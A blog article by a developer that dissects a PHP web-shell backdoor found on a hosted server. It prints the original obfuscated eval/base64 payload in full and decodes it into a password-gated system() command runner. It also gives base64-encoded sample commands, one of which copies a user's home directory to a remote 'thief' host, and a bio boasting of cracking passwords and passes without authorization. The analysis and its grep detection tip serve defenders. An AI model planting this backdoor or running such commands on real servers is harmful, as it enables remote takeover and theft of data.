Server Virus under Attack

This article studies in details the anatomy of a server virus, it’s reverse assembly, method of attack, and how it can be disabled.

An account I manage for a Startup has been hacked. This happens all the time I’m sure ; what was troubling to me is that the reaction of the tech support (ref.) was to change our password weekly, as in the FTP security was compromised. The whole server was compromised by a R.A.T. (Remote Access Tool), and changing all the customer’s passwords had little effect other than annoy them and, in my case, trigger my curiosity and:

  1. Disassemble the Virus
  2. Make a mental mark that that company’s technical support was incompetent enough to avoid, at all costs, to do business with them.

Architectural Foreword

As an architect, I surround myself with competent, dedicated and smart individuals who have the potential, if not the proven track record, of having solved difficult problems in their field. In short, I work with experts.

In my vision, an ISP who knows less than I do about servers, protocols, privacy and security might as well be a fly-by-night tainted operation: I respect scientist who know more in their field than I do. And since neither my formal academic training  nor my area of expertise is in IT, all sorts of red bells rung when it took me less time to disassemble the Virus than for the Support Team to notify their user’s data was seriously compromised.

To prove my point, you will be guided at the end of this article to a hands-on exercise where you yourself get to try the virus, in the safety of this lab environment.

I now invite you to discover how I disarmed this malicious software, try it yourself, and find hints on how to look for possible infections.

The Anatomy of a Server Virus

1. Facts

  1. Your server, connected to  the outside world, is constantly under attack.
  2. If your server is online, you are at risk.
  3. Viruses used to be silly malicious software that could damage your computer. Viruses are now clever malicious malware that will hurt you and others on a large scale.
  4. knowledge is power. If you know what is coming your way, you may be able to deflect the attack.

2. Reality Check

  1. You (the honest website builder) only have the available tools to protect yourself. We will call that the shield. Them (the malicious hackers) are well aware of the shields you use, their strength, limitations, pitfalls and even bugs. They constantly use smarter, more advanced, distributed technology. Yes, eventually, a better sword will pierce your shield.
  2. If you are the IT manager of a fortune 500 company, bother reading this article not. You already know what I am talking about, and the funds you ditch yearly in security exceeds my lifetime salary a few folds already. For the rest of us, who host our sites on one of the well known providers, it is a different story. Infections cross user accounts, enter via ways we, the host customer, have no defense.
  3. Viruses plaguing servers have various intentions, generally stealing processor time, server’s bandwidth, server’s content, and, well, money.
  4. Know how to identify a server virus. This is what this article is about.

3. What’s a R.A.T.

R.A.T. stands for Remote Administration Tool.

A R.A.T. is a remotely controlled virus.

It is a virus that knows no account limit, no time limit, no power limit. It is an incredibly small file, with incredibly little intelligence. Let me compare 3 classes of viruses to clarify that statement:

  1. An old school Trojan is a malicious software which you would install yourself on you machine. It presents itself as a sheep, while it is a wolf. Once you run it, all hell breaks loose. Because you would install it yourself, a Trojan can be a rather large piece of software. You generally would know right away you are infected, only too late.
  2. A traditional Virus is a small software which tucks itself inside another, otherwise harmless software. Hence the name Virus, which implies infecting larger applications (and hiding there), self replicating capabilities, and of course some malicious objective and often disastrous side effects.
  3. a R.A.T. is even smaller than a Virus. Think of it as an inert piece of DNA. It knows nothing, does nothing, can’t reproduce itself on its own. A R.A.T. by itself is harmless. Launch it an nothing happens. Delete it and no harm is done.

4. Why is a R.A.T. dangerous?

A R.A.T. gives total control, I repeat, total control of your computer (i.e. the server) to a another computer, remotely. That remote computer may be located on Mars for all I know, and reproduce like rabbits, install new software, de-activate your virus protection software, delete files, snoop around, trace your activities, read all your information, etc.

Quick, think about something your server can do.
Yes, a R.A.T. can do that too. And using your account credentials while it’s at it.

5. Will a R.A.T. disable my computer?

Unlikely. The strength of a R.A.T. is it’s stealth mode operation. Removing files, compromising your server mode of operation, or being discovered is probably the last thing a R.A.T. will do. That would be a suicidal R.A.T., but in order to disable a system on a large scale, this is entirely conceivable.

Few secret agents wear the official secret agent outfit (dark glasses, cool hat, long coat, and newspaper to hide behind). R.A.T. is no exception.

6. Will a R.A.T. make unauthorized use of my server?

Likely. And others, too. It will send spam, trace transactions, and multiply discreetly. The more R.A.T. around, the harder to eradicate.

7. Can I protect myself against a R.A.T.?

If you host your own domain on your own system, possibly. This is beyond the scope of this article.

If you use an external host on a shared computer, this responsibility is shared between you and that host. Your responsibility is to keep your directories non writable when possible, and report suspect files, while the host’s responsibility is to take immediate action if an infection occurs.

Do not rely on that statement! The reason I am writing this article in the first place is that a national provider has been infected, and while we gave said host all information about the infection, their response was to change our FTP password, randomly, once a week.

Let me make that clear. Bleeding a patient rarely improves a fever.

8. What to do when infected?

  1. rename the suspicious file right away. Do not delete it! If that file was not a R.A.T, you may permanently damage your own server! Renaming it will give you a chance to reactivate the offending file, if it was not a R.A.T. after all.
  2. Remove it’s executable permission. Native server R.A.T. will be executable by definition, so that may be a valid method. Know that this may not be enough.
  3. Move it to a different directory. Chances are the remote computer won’t find it, at least right away
  4. ZIP it! A compressed R.A.T. (or Virus, or Trojan) is, by definition, disabled.
  5. Send that ZIP file to me for analysis ! (dev@thegothicparty.com). Time permits, we will look at it and suggest appropriate action.

I recommend renaming a potential R.A.T. and lowering privileges and as your first line of defense: this will prevent the remote controller from finding it, and if it does, prevent the file from being read and the script executed by an unauthorized user.

9. R.A.T. dissection

I will spare you the gory details. Here is a step-by-step analysis of the remote access tool that infected <name withheld> national provider mentioned above.

9.1. File specifics

  • Original virus name, as stored on the server:
    googlecalendar.php
    We had never installed googlecalendar in that well controlled environment, so the presence of that file was rather suspicious.
  • Original virus content, when opened with a text editor:
    <?php $X=basename(__FILE__); $l="aWYoJF9QT1NUWyJsaW5rIl0peyRzdW0
    9c3Vic3RyKCRfUE9TVFsibGluayJdLCBzdHJsZW4oJF9QT1NUWyJsaW5rIl0pLTQ
    sc3RybGVuKCRfUE9TVFsibGluayJdKS0xKTsgaWYoJHN1bT0iMWpYIil7JGxpbms
    9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJsaW5rIl0sIDAsIHN0cmxlbig
    kX1BPU1RbImxpbmsiXSktNCkpOyBAc3lzdGVtKCRsaW5rKTt9fQ=="; eval(bas
    e64_decode($l)); ?>

9.2. aWYoJF9QT1N… etc. Plain English for the Reasonable Man.

Substituting the stream of evidently obfuscated 276 characters by “obfuscated”, adding some formatting, and some comments:

<?php                         // Execute the following PHP script
    $X=basename(__FILE__);    // Store where we're at into $X
    $l="obfuscated";          // Put some {magic} into $l
    eval(                     // execute the {magic}
        base64_decode($l)     // decode "obfuscated"
    );
?>

The eval command is the danger here, and replacing eval by echo and merely executing the PHP script transforms “obfuscated” into this dangerous algorithtm:

if($_POST["link"]){$sum=substr($_POST["link"], strlen($_POST["li
nk"])-4,strlen($_POST["link"])-1); if($sum="1jX"){$link=base64_d
ecode(substr($_POST["link"], 0, strlen($_POST["link"])-4)); @sys
tem($link);}}

9.3. Here is the formatted source code…

Reversed-engineered by our good people at the lab, conveniently indented and commented, it turns out to be a well written piece of code, which will execute without flaws. Dynamic commands can be generated remotely, executed by the R.A.T., and the results sent back to the originating organization.

if( $_POST["link"]) {  // Retrieve the link parameter in the URL
                       // In this RAT, it will look like this:
                       // {yourserver}/googlecalendar.php?link={magic}
    $sum=substr( $_POST["link"],
                 strlen($_POST["link"])-4,
                 strlen($_POST["link"])-1);
                       // extract a signature from <magic>
                       // It is made up of 3 characters at the end
   &nbsp;if( $sum="1jX") {
                       // If the signature matches, then decode it
                       // using MIME base64.
                       // Note that the hacker permanently hardcoded
                       // the signature as "1jx"
        $link=base64_decode( substr($_POST["link"],
                             0,
                             strlen($_POST["link"])-4));
                       // convert {magic} (minus the signature)
                       // into a command. There is no further
                       // verification that this command is valid.
        @system($link);
                       // use @ to suppress error, warnings and
                       // order the system to execute the command!
    }
}

9.4. How to find this virus on your system?

Bother not looking for the filename. Instead, trust that this RAT encodes/decodes previously base64 encoded string, so execute a grep as follow and inspect the result.
[~] grep -r "base64_decode" .

R.A.T. – Dead.

10. Experiment with the R.A.T.

Disclaimer: The R.A.T. you are about to try is, well, in a coma. It will analyze the parameters you are sending, and stop short of executing the command. The result will be displayed in a new window. Neither you nor the server hosting thegothicparty.com is at risk.

10.1. Here are some R.A.T. commands ready to try:

  1. bHMgLWFs1jx=

    (List the content of the current directory)

  2. Y2htb2QgIHggZmlsZQ==1jx=

    (Make a file executable, so it can be run)

  3. c2NwIC1yIH4gdGhpZWZAc29tZS5sb2NhdGlvbi5vbi5tYXJz1jx=

    (Copy the entire user directory to a remote location)

10.2. Create your own R.A.T. commands and try them out!

Use this URL to create a Linux command, encode it in base 64, add the password, and then feed the result to the R.A.T.!

  1. Substitute {your-command} by, well, your command.http://thegothicparty.com/dev/wp-content/extras/server-side-virus-rat/base64.php?raw={your-command}
  2. Now that you have an encoded command, us it to invoke the R.A.T. http://thegothicparty.com/dev/wp-content/extras/server-side-virus-rat/rat.php?link={encoded-command}

If you succeed, you will get to a page that says “@system(do-something-horrible)”, which in the original RAT could have had disastrous effects. Good thing you are in the lab!

This makes you a hacker, I think…

About the Author

Xavier Schott has written shield and swords for as long as I have been developing software. In reverse order, here are some interesting swords:

  1. Cracked some authentication method used by <name withheld> convention, and came out with about 70 free passes overnight. Paid full price for the entry fee, then re-entered <name withheld> convention with one of the free code, and proceeded to distribute my resume to security companies in order to land a job as a legal hacker, finding cracks in their system in order to improve it. Some simply kicked me out of their stand, some were both intimidated and scared, and no-one called me back.
  2. Cracked the user’s password for <name withheld> who had lost access to his online service information. Connected a computer to his network, made my computer act as a host (to which his computer blindly trusted), led his software think it was communicating with a distant server.
  3. Cracked the administrative password for <name withheld>, an accounting software, while the company’s accountant had been fired and was nowhere to be found. Created 2 new fresh installation of said software, with 2 carefully chosen set of data, and diff’ed the two. The password was the name of his girfriend, and the company that ordered the work never paid as promised.
  4. Cracked some other <name withheld> applications which are too sensitive to reveal here.

And here is a list of the most famous shields I wrote:

  1. <name withheld>
  2. <name withheld>
  3. etc.

References

  1. This article was originally published under the title How does a server-side virus work? (RAT) on http://thegothicparty.com/dev/article/server-side-virus-rat/

Xavier Schott

0010 0000 years of algorithm crafting, software architecture, and bringing visionary mobile apps to market.